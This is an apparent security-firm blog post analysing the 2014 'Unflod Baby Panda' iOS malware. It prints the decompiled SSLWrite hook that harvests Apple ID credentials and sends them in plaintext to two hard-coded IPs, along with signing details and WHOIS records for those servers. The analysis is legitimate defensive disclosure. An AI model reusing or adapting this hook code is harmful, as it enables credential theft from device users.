iOS Malware Campaign "Unflod Baby Panda"
SektionEins did a quick and dirty analysis of Unfold.dylib which is part of an iOS malware campaign targetting jailbroken iPhones.
Introduction
On 17th April 2014 a malware campaign targetting users of jailbroken iPhones has been discovered and discussed by reddit users. This malware appears to have Chinese origin and comes as a library called Unflod.dylib that hooks into all running processes of jailbroken iDevices and listens to outgoing SSL connections. From these connections it tries to steal the device's Apple-ID and corresponding password and sends them in plaintext to servers with IP addresses in control of US hosting companies for apparently Chinese customers.
Users of reddit have made this malware available to the public, which allowed SektionEins to perform an analysis of this threat.
However so far only the malware itself has been found and until now it is unknown how it ends up on jailbroken phones. Rumours that Chinese piracy repositories are involved are so far unverified.
Meanwhile it has been discovered that framework.dylib is another name for the same threat used in other infections.
The Binary
The malware comes as a Mach-O ARMv7 dynamic library called Unflod.dylib (or framework.dylib) that is installed as MobileSubstrate extension inside the path:
It has been suggested that the choice of name might have something todo with the existence of a real tweak called Unfold. The choice of name might therefore just be an attempt to hide in plain sight.
While analysing the binary SektionEins discovered that the binary itself contains strings that hint at the threat being compiled with XCode on a Mac OS X system. Infact the following string was found inside the Mach-O header as the name of the library during compilation.
/Users/apple/Library/Developer/Xcode/DerivedData/framework-guknhpkmreoccjbplfeebcklivmx/Build/Products/Debug-iphoneos/framework.app/framework
This string reveals that the project name during compilation was "framework.app" and that it was compiled by a user called "apple". Further information inside the Mach-O header seems to indicate that the binary was compiled against the iOS 6.1 SDK.
During our analysis it was also discovered that the threat is digitally signed with an iPhone developer certificate. As you can see below.
$ codesign -vvvv -d Unflod.dylib Executable=./Unflod.dylib Identifier=com.your.framework Format=Mach-O thin (armv7) CodeDirectory v=20100 size=227 flags=0x0(none) hashes=3+5 location=embedded Hash type=sha1 size=20 CDHash=da792624675e82b3460b426f869fbe718abea3f9 Signature size=4322 Authority=iPhone Developer: WANG XIN (P5KFURM8M8) Authority=Apple Worldwide Developer Relations Certification Authority Authority=Apple Root CA Signed Time=14 Feb 2014 04:32:58 Info.plist=not bound Sealed Resources=none Internal requirements count=2 size=484
As you can see from above the developer certificate issued by Apple is registered to a person called WANG XIN. This person might be a fake persona, the victim of certificate theft or really involved. It is impossible for us to know, but Apple should be able to investigate from this information and terminate that developer account.
Furthermore the signature date is the 14th of February of this year, which hints at this threat being around for a short while now without being discovered.
It is important to remember that this threat only affects jailbroken iPhones and therefore the signature on the binary is not required for the malware to work at all. The fact that it is still there is an oversight (or misinformation) by the attacker.
The Code
The malicious code itself is not very big. Everything is contained inside one function called replace_SSLWrite that decompiles as seen below.
int __fastcall replace_SSLWrite(int a1, char *a2, int a3, int a4) { int v4; // r3@11 int v5; // ST28_4@14 size_t v6; // ST24_4@14 int v7; // ST10_4@18 size_t v8; // ST0C_4@18 struct sockaddr v10; // [sp+40h] [bp-60h]@16 ssize_t v11; // [sp+50h] [bp-50h]@14 int v12; // [sp+54h] [bp-4Ch]@14 struct sockaddr v13; // [sp+58h] [bp-48h]@12 ssize_t v14; // [sp+68h] [bp-38h]@10 int v15; // [sp+6Ch] [bp-34h]@10 char *v16; // [sp+70h] [bp-30h]@7 char *v17; // [sp+74h] [bp-2Ch]@5 char *v18; // [sp+78h] [bp-28h]@5 char *v19; // [sp+7Ch] [bp-24h]@2 int v20; // [sp+80h] [bp-20h]@1 int v21; // [sp+84h] [bp-1Ch]@1 char *v22; // [sp+88h] [bp-18h]@1 int v23; // [sp+8Ch] [bp-14h]@1 int v24; // [sp+90h] [bp-10h]@11 int v25; // [sp+94h] [bp-Ch]@1 v25 = __stack_chk_guard; v23 = a1; v22 = a2; v21 = a3; v20 = a4; if ( !findhead ) { v19 = strstr(v22, "/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1"); if ( v19 ) { findhead = 1; strcpy(content, v22); } } if ( findhead == 1 ) { v18 = strstr(v22, "<key>appleId</key>"); v17 = strstr(v22, "<key>password</key>"); if ( v18 ) { if ( v17 ) { strcat(content, v22); v16 = strstr(content, "</plist>"); if ( v16 && v16 - content <= 2040 ) v16[8] = 0; v14 = 0; v15 = socket(2, 1, 0); if ( v15 < 0 ) { v24 = pSSLWrite(v23, v22, v21, v20); goto LABEL_20; } v13.sa_family = 2; *(_WORD *)&v13.sa_data[0] = 0xC61Eu; *(_DWORD *)&v13.sa_data[2] = inet_addr("23.88.10.4"); if ( connect(v15, &v13, 0x10u) < 0 ) { close(v15); v24 = pSSLWrite(v23, v22, v21, v20); goto LABEL_20; } v5 = v15; v6 = strlen(content); v14 = write(v5, content, v6); v11 = 0; close(v15); v12 = socket(2, 1, 0); if ( v12 < 0 ) { v24 = pSSLWrite(v23, v22, v21, v20); goto LABEL_20; } v10.sa_family = 2; *(_WORD *)&v10.sa_data[0] = 0xC61Eu; *(_DWORD *)&v10.sa_data[2] = inet_addr("23.228.204.55"); if ( connect(v12, &v10, 0x10u) < 0 ) { close(v12); v24 = pSSLWrite(v23, v22, v21, v20); goto LABEL_20; } v7 = v12; v8 = strlen(content); v11 = write(v7, content, v8); close(v12); findhead = 2; } } } v24 = pSSLWrite(v23, v22, v21, v20); LABEL_20: if ( __stack_chk_guard != v25 ) __stack_chk_fail(__stack_chk_guard, v24, v25, v4); return v24; }
The malware basically hooks into SSLWrite of the Security.framework and scans the buffer for certain strings that indicate the presence of the Apple-ID and the password for it. If those are found the code attempts to connect to the IPs 23.88.10.4 and 23.228.204.55 on port 7878 to send out the stolen data in plaintext.
The IPs
At the time of writing only the first IP seems to still accept connections on port 7878. Looking up this IP in the WHOIS database reveals the following information.
NetRange: 23.88.0.0 - 23.89.255.255 CIDR: 23.88.0.0/15 OriginAS: AS18978 NetName: ENZUINC-US-BLK12 NetHandle: NET-23-88-0-0-1 Parent: NET-23-0-0-0-0 NetType: Direct Allocation RegDate: 2013-06-07 Updated: 2013-06-07 Ref: http://whois.arin.net/rest/net/NET-23-88-0-0-1 OrgName: Enzu Inc OrgId: ENZUI Address: 2360 Corporate Circle Address: Suite 400 City: Henderson StateProv: NV PostalCode: 89074 Country: US RegDate: 2010-02-24 Updated: 2012-04-25 Comment: -------------------------------- Comment: Enzu Inc. Comment: 2360 Corporate Circle Suite 400 Comment: Henderson, NV 89074 Comment: https://www.enzu.com Comment: -------------------------------- Comment: Please send all Abuse, Trademark, Comment: Legal Compliance, and Law Enforcement Comment: requests to abuse@scalabledns.com Ref: http://whois.arin.net/rest/org/ENZUI ReferralServer: rwhois://rwhois.scalabledns.com:4321 OrgTechHandle: NETWO3674-ARIN OrgTechName: Network Operations OrgTechPhone: +1-702-965-1615 OrgTechEmail: OrgTechRef: http://whois.arin.net/rest/poc/NETWO3674-ARIN OrgAbuseHandle: ABUSE2868-ARIN OrgAbuseName: Abuse OrgAbusePhone: +1-702-965-1615 OrgAbuseEmail: OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE2868-ARIN OrgNOCHandle: NETWO3674-ARIN OrgNOCName: Network Operations OrgNOCPhone: +1-702-965-1615 OrgNOCEmail: OrgNOCRef: http://whois.arin.net/rest/poc/NETWO3674-ARIN == Additional Information From rwhois://rwhois.scalabledns.com:4321 == %rwhois V-1.5:003fff:00 rwhois.scalabledns.com (by Network Solutions, Inc. V-1.5.9.5) Network:Class-Name:Network Network:ID:CID-10648 Network:Auth-Area:23.88.0.0/15 Network:Network-Name:ENZUINC-23.88.10.0/25 Network:IP-Network:23.88.10.0/25 Network:IP-Network-Block:23.88.10.0 - 23.88.10.127 Network:Org-ID;I:ORG-10648 Network:Org-Name;I:ORG-10648 Network:Tech-Contact;I:CID-10648 Network:Admin-Contact;I:CID-10648 Network:Create:20120425 Network:Update:20140401 Network:UpdatedBy: Network:Class-Name:Network Network:ID:CID-6853 Network:Auth-Area:23.88.0.0/15 Network:Network-Name:ENZUINC-23.88.10.0/24 Network:IP-Network:23.88.10.0/24 Network:IP-Network-Block:23.88.10.0 - 23.88.10.255 Network:Org-ID;I:ORG-6853 Network:Org-Name;I:ORG-6853 Network:Tech-Contact;I:CID-6853 Network:Admin-Contact;I:CID-6853 Network:Create:20120425 Network:Update:20130919 Network:UpdatedBy:
The second IP that no longer seems to accept connections on port 7878 reveals the following information.
NetRange: 23.228.192.0 - 23.228.255.255 CIDR: 23.228.192.0/18 OriginAS: AS40676 NetName: PSYCHZ-NETWORKS NetHandle: NET-23-228-192-0-1 Parent: NET-23-0-0-0-0 NetType: Direct Allocation RegDate: 2013-09-19 Updated: 2013-09-19 Ref: http://whois.arin.net/rest/net/NET-23-228-192-0-1 OrgName: Psychz Networks OrgId: PS-184 Address: 20687-2 Amar Road #312 City: Walnut StateProv: CA PostalCode: 91789 Country: US RegDate: 2013-04-17 Updated: 2013-09-05 Ref: http://whois.arin.net/rest/org/PS-184 ReferralServer: rwhois://rwhois.psychz.net:4321 OrgAbuseHandle: NOC3077-ARIN OrgAbuseName: NOC OrgAbusePhone: +1-626-549-2801 OrgAbuseEmail: OrgAbuseRef: http://whois.arin.net/rest/poc/NOC3077-ARIN OrgTechHandle: NOC3077-ARIN OrgTechName: NOC OrgTechPhone: +1-626-549-2801 OrgTechEmail: OrgTechRef: http://whois.arin.net/rest/poc/NOC3077-ARIN == Additional Information From rwhois://rwhois.psychz.net:4321 == %rwhois V-1.0,V-1.5:00090h:00 portal.psychz.net (Ubersmith RWhois Server V-2.4.0) autharea=23.228.192.0/18 xautharea=23.228.192.0/18 network:Class-Name:network network:Auth-Area:23.228.192.0/18 network:ID:NET-16983.23.228.204.0/25 network:Network-Name:23.228.204.0/25 network:IP-Network:23.228.204.0/25 network:IP-Network-Block:23.228.204.0 - 23.228.204.127 network:Org-Name:znznet network:Street-Address:è¾½å®æ²é³åå¹³åº5-1-1 network:City:æ²é³ network:State:è¾½å® network:Postal-Code: network:Country-Code:CN network:Tech-Contact:MAINT-16983.23.228.204.0/25 network:Created:20131205052358000 network:Updated:20131205052358000 network:Updated-By: contact:POC-Name:Network Administrator contact:POC-Email: contact:POC-Phone: contact:Tech-Name:Network Administrator contact:Tech-Email: contact:Tech-Phone:
As you can see at least the second IP has some connection to China.
Removal
Currently the jailbreak community believes that deleting the Unflod.dylib/framework.dylib binary and changing the apple-id's password afterwards is enough to recover from this attack. However it is still unknown how the dynamic library ends up on the device in the first place and therefore it is also unknown if it comes with additional malware gifts.
We therefore believe that the only safe way of removal is a full restore, which means the removal and loss of the jailbreak.
Final Words
As you can see this is a quick and dirty analysis of the threat that shows several indicators that a chinese party is involved. It is however unclear at the moment how the actual malware binaries end up on jailbroken iPhones.
If you have further information about this threat that you would like to share with us or want to enquire about our services don't hesitate to contact us at info@sektioneins.de.